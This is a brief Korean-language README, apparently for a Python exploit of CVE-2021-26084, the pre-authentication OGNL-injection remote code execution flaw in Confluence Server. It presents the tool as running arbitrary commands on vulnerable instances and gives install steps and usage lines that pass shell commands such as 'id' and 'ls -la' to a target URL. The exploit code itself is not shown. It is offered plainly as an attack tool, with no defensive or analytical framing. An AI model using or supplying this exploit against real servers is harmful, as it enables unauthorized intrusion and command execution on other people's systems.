
Python 익스플로잇: CVE-2021-26084를 대상으로 하며, OGNL 주입을 통한 Confluence Server 사전 인증 원격 코드 실행을 노립니다. 취약한 인스턴스에서 임의의 명령을 실행합니다.
CVE-2021-26084 - Confluence 사전 인증 RCE | OGNL 주입
pip3 install -r requirements.txt
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'